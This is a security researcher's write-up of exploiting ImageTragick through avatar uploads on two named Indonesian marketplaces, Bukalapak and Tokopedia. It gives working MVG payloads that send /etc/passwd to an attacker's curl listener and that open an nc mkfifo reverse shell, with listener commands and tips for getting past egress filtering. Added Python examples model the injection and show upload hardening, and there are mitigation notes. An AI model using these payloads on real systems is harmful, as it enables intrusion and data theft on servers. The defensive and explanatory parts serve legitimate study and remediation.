After I wrote a CTF challenge about ImageTragick for Botani CTF, I got curious whether any web apps were still vulnerable to this bug, so I started testing two well-known Indonesian startups, Bukalapak and Tokopedia. Both are C2C marketplaces in Indonesia where anyone can open an online store and sell to buyers all over the country.
ImageTragick (CVE-2016-3714) was disclosed in May 2016 by Nikolay Ermishkin. It affects ImageMagick releases up to 6.9.3-9 and 7.0.1-0; the fixed versions are 6.9.3-10 and 7.0.1-1. The root cause: when the input filename is a URL, ImageMagick fetches the file before the conversion step. For https it does not perform the fetch itself but runs an external delegate (curl) through a shell command template from delegates.xml, substituting the filename into that template. Because the filename was not sanitized, a double quote closes the quoted URL argument and characters such as ; and | inject further commands. What looks like an SSRF primitive at first is therefore remote code execution. An example:
$ convert 'https://hrdn.us";|ls "-la' tmp.png
total 32
drwxr-xr-x   6 hrdn hrdn  204 Jun 11 21:01 .
drwxr-xr-x 232 hrdn hrdn 7888 Jun 11 11:37 ..
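To make the injection point concrete, here is an added example that is not code from the original post or from ImageMagick: a small Python model of the delegate expansion. For an https input, ImageMagick 6.9.3 expands the https entry from delegates.xml (the template is copied into the block) by substituting the filename for %M and hands the resulting string to the shell. The sanitizer is this example's own stand-in for the filename filtering that the upstream fix added, not the real ImageMagick code; the tokenizer shows which separate programs sh would run in each case. The sample payloads are the two from this post, with 203.0.113.5:9700 standing in for the attacker's listener.

```python
"""Added example, not code from the original post or from ImageMagick: a
Python model of the ImageTragick injection point. The delegate template is
copied from 6.9.3's delegates.xml; sanitize() is this example's own stand-in
for the upstream fix's filename filtering. Sample payloads are the post's,
with 203.0.113.5:9700 as a placeholder for the attacker's listener."""
import re
import shlex

# https delegate from delegates.xml (6.9.3): %o = temp output file, %M = the
# input filename as given by the user, with the "https:" scheme already stripped.
HTTPS_DELEGATE = '"curl" -s -k -o "%o" "https:%M"'

# Characters a URL-ish filename may keep in the hardened variant. Quotes, ; | &,
# $, backtick, whitespace and anything else are replaced with "_".
_UNSAFE = re.compile(r'[^A-Za-z0-9._/:?=%~+-]')


def expand_unsafe(filename, outfile="/tmp/magick-out"):
    """Vulnerable expansion: plain string substitution, no filtering at all."""
    return HTTPS_DELEGATE.replace("%o", outfile).replace("%M", filename)


def sanitize(filename):
    """Hardened variant: neutralise shell metacharacters before substitution."""
    return _UNSAFE.sub("_", filename)


def expand_safe(filename, outfile="/tmp/magick-out"):
    """Same template, but the filename is sanitized before it is substituted."""
    return HTTPS_DELEGATE.replace("%o", outfile).replace("%M", sanitize(filename))


def shell_words(command):
    """Tokenise like sh: quotes group, whitespace splits, and runs of ;|&()<>
    come back as separate operator tokens (Python 3.8+ shlex behaviour)."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def commands_run(command):
    """Name of every program sh would execute for this command line: the first
    word, plus the first word after each ; | & && || operator token."""
    programs, at_start = [], True
    for word in shell_words(command):
        if word and all(c in ";|&" for c in word):
            at_start = True
            continue
        if at_start:
            programs.append(word)
            at_start = False
    return programs


# Constructed inputs: the post's two payloads as ImageMagick sees them
# (scheme removed, leading // kept). The listener address is a placeholder.
LS_PAYLOAD = '//hrdn.us";|ls "-la'
EXFIL_PAYLOAD = '//whatev.er";| cat /etc/passwd | curl -d @- 203.0.113.5:9700 | touch "hello'

if __name__ == "__main__":
    for name in (LS_PAYLOAD, EXFIL_PAYLOAD):
        print("unsafe:", commands_run(expand_unsafe(name)))
        print("safe:  ", commands_run(expand_safe(name)))
```

With the unsafe expansion the ls payload yields two programs (curl, then ls) and the exfiltration payload yields four (curl, cat, curl, touch); after sanitizing, the whole filename stays inside the single quoted URL argument and only curl runs. The fix is the filtering before substitution, not the quotes in the template, which the payload defeats by supplying its own.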
While testing for ImageTragick I kept running into file-upload features, and an MVG file carrying the payload is the natural thing to upload. Both startups let a user upload an avatar from the profile page, which is the feature I targeted.
Steps to reproduce
Create a file named avatar.jpg containing the MVG below. The .jpg extension is irrelevant: ImageMagick identifies the format from the content (an MVG file starts with push graphic-context), so the file is handed to the MVG coder and the url() in the fill is fetched through the vulnerable https delegate.
push graphic-context
viewbox 0 0 640 480
fill 'url(https://whatev.er";| [RCE HERE] | touch "hello)'
pop graphic-context
To run a command and get its output back, pipe the result into curl, which POSTs it to a listener we control:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://whatev.er";| cat /etc/passwd | curl -d @- [ip:port] | touch "hello'
pop graphic-context
First, start a listener with netcat on our server:
$ nc -lvp 9700
Listening on [0.0.0.0] (family 0, port 9700)
Then visit the profile page https://www.bukalapak.com/users/your_user_id/edit and upload avatar.jpg as the avatar.
Voilà! The listener receives the command output (here the contents of /etc/passwd) from the Bukalapak server.
Gaining reverse shell
We can use one of the reverse-shell one-liners from pentestmonkey's cheat sheet. I personally use the netcat one below; the mkfifo trick means it also works with netcat builds that lack the -e option.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip] [port] >/tmp/f
This time we execute the payload on Tokopedia, whose avatar upload is vulnerable in the same way as Bukalapak's. Create the payload file avatar.jpg:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://whatev.er";| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [your ip] [your port] >/tmp/f | touch "hello'
pop graphic-context
Then start a listener as before. The port number doesn't matter as long as it doesn't collide with another program; ports below 1024 require root to bind. Since the connection is outbound from the victim server, pick a port that its egress filtering is likely to allow if the first attempt never connects.
$ nc -lvp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Visit the profile page https://www.tokopedia.com/people/your_user_id/edit and upload the payload avatar.jpg.
We get a reverse shell.
Mitigation
- Update ImageMagick to a fixed release (6.9.3-10 / 7.0.1-1 or later).
- Harden policy.xml so the dangerous coders (EPHEMERAL, URL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, PLT) are denied: http://www.imagemagick.org/discourse-server/viewtopic.php?t=29588
- Verify uploaded files by their magic bytes before ImageMagick sees them, and pass an explicit format prefix (e.g. jpeg:avatar.jpg) so the file's content cannot choose the coder.
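The defensive side of the avatar flow, as an added example that is not code from the original post nor from Bukalapak or Tokopedia: an upload handler that sniffs magic bytes and accepts only real raster formats, builds the ImageMagick command line with explicit coder prefixes on input and output so a text MVG named avatar.jpg can never reach the MVG coder, and points ImageMagick at a hardened policy.xml through MAGICK_CONFIGURE_PATH. The policy is the one from the ImageTragick disclosure; the size limit, the 200x200 resize and the sample bytes are this example's own constructed choices.

```python
"""Added example (not the original post's code, nor either site's): upload
checks that stop an MVG payload named avatar.jpg before ImageMagick parses it.
Layers: (1) magic-byte sniffing with an allow-list, (2) explicit coder prefixes
on the convert command line, (3) a hardened policy.xml loaded via
MAGICK_CONFIGURE_PATH. Sample inputs are constructed; 203.0.113.5 is a placeholder."""
import os

# Leading bytes of the only formats an avatar upload should accept.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# policy.xml from the ImageTragick disclosure: deny every coder that reaches a
# delegate, a remote fetch, or a text-based drawing language.
HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
</policymap>
"""


def sniff_image(data: bytes):
    """Return 'jpeg'/'png'/'gif' from the leading bytes, else None. ImageMagick
    picks its coder from content, so the .jpg name proves nothing; the post's
    payload starts with 'push graphic-context' and matches no entry here."""
    for magic, fmt in MAGIC.items():
        if data.startswith(magic):
            return fmt
    return None


def validate_upload(data: bytes, max_bytes: int = 2 * 1024 * 1024) -> str:
    """Reject oversized or non-raster uploads before ImageMagick sees them."""
    if len(data) > max_bytes:
        raise ValueError("upload too large")
    fmt = sniff_image(data)
    if fmt is None:
        raise ValueError("not a JPEG/PNG/GIF (magic bytes mismatch)")
    return fmt


def convert_argv(src_path: str, fmt: str, dst_path: str, size: str = "200x200"):
    """convert command line with explicit coder prefixes on both sides
    (jpeg:in, png:out), so neither content nor file name can select MVG, SVG
    or a delegate. fmt must come from validate_upload()."""
    if fmt not in MAGIC.values():
        raise ValueError("refusing unvalidated format %r" % fmt)
    return ["convert", "%s:%s" % (fmt, src_path), "-resize", size,
            "png:%s" % dst_path]


def hardened_env(confdir: str) -> dict:
    """Write HARDENED_POLICY as policy.xml into confdir and return an environment
    whose MAGICK_CONFIGURE_PATH makes ImageMagick load that policy."""
    os.makedirs(confdir, exist_ok=True)
    with open(os.path.join(confdir, "policy.xml"), "w") as fh:
        fh.write(HARDENED_POLICY)
    env = dict(os.environ)
    env["MAGICK_CONFIGURE_PATH"] = confdir
    return env


# Constructed sample inputs: a minimal JPEG header and the post's MVG payload.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
SAMPLE_MVG = (b"push graphic-context\nviewbox 0 0 640 480\n"
              b"fill 'url(https://whatev.er\";| cat /etc/passwd | curl -d @- "
              b"203.0.113.5:9700 | touch \"hello'\npop graphic-context\n")

if __name__ == "__main__":
    print(sniff_image(SAMPLE_JPEG), sniff_image(SAMPLE_MVG))
    print(convert_argv("avatar.jpg", validate_upload(SAMPLE_JPEG), "avatar.png"))
```

In a real handler the order matters: validate_upload() runs first, the format it returns is the only thing that may select the coder in convert_argv(), and the subprocess is launched with env=hardened_env(...) so that even an ImageMagick build that is still vulnerable has the HTTPS and MVG coders denied. The policy is defence in depth, not a substitute for the version update.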